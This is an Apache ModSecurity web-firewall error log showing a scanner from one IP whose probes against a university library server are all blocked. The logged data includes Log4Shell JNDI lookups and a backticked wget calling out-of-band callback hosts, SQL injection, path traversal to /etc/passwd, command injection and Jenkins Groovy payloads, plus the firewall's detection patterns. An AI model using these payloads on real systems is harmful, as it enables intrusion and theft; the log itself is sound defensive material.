[Tue Aug 29 11:32:32.371161 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARLXvAAAAAQ"]
[Tue Aug 29 11:32:32.371212 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARLXvAAAAAQ"]
[Tue Aug 29 11:32:32.391296 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAANwN1MAAAAb"]
[Tue Aug 29 11:32:35.364762 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlggfkdndeen8yht.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlggfkdndeen8yht.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgxr3r7u9pao7if.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAAN9sXAAAAAJ"]
[Tue Aug 29 11:32:36.363952 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAAQ83VUAAAAI"]
[Tue Aug 29 11:32:37.419950 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAAN9sXMAAAAJ"]
[Tue Aug 29 11:32:38.351785 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAAQ9H5MAAAAK"]
[Tue Aug 29 11:32:38.425120 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAARH7I0AAAAM"]
[Tue Aug 29 11:32:40.417653 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgxhx9fa9ruknz4.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAARNk50AAAAS"]
[Tue Aug 29 11:32:42.510773 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARD1PwAAAAH"]
[Tue Aug 29 11:32:46.423959 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARTEJUAAAAG"]
[Tue Aug 29 11:32:47.543124 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARA7bkAAAAA"]
[Tue Aug 29 11:32:47.597330 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAAPDoIwAAAAP"]
[Tue Aug 29 11:32:49.418412 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: \\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAARR23QAAAAF"]
[Tue Aug 29 11:32:49.429540 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARMMegAAAAR"]
[Tue Aug 29 11:32:51.478155 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAAPDoJMAAAAP"]
[Tue Aug 29 11:32:59.318992 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAPDoJkAAAAP"]
[Tue Aug 29 11:32:59.375544 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAAQMr4kAAAAu"]
[Tue Aug 29 11:32:59.784608 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgoek4ymquws3fh.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARR248AAAAF"]
[Tue Aug 29 11:33:05.764164 2023] [:error] [pid 1111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARXH8kAAAAI"]
[Tue Aug 29 11:33:09.423823 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARA7dQAAAAA"]
[Tue Aug 29 11:33:09.911779 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/app"] [unique_id "ZO11BcCo-f0AAARH7NAAAAAM"]
[Tue Aug 29 11:33:10.370158 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAARR26IAAAAF"]
[Tue Aug 29 11:33:11.306126 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARR26YAAAAF"]
[Tue Aug 29 11:33:12.512515 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARYxC8AAAAJ"]
[Tue Aug 29 11:33:12.736113 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgitsf3ubp7pfmr.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgitsf3ubp7pfmr.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARQ36sAAAAB"]
[Tue Aug 29 11:33:12.822927 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAANsAc0AAAAD"]
[Tue Aug 29 11:33:12.823549 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgitj4477jskwrr.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgitj4477jskwrr.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARNk9MAAAAS"]
[Tue Aug 29 11:33:13.299897 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgxb7fhdq1o1qij.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgxb7fhdq1o1qij.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARH7N8AAAAM"]
[Tue Aug 29 11:33:13.337696 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgbgdnhqbpm5xs5.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgbgdnhqbpm5xs5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAAQKOisAAAAs"]
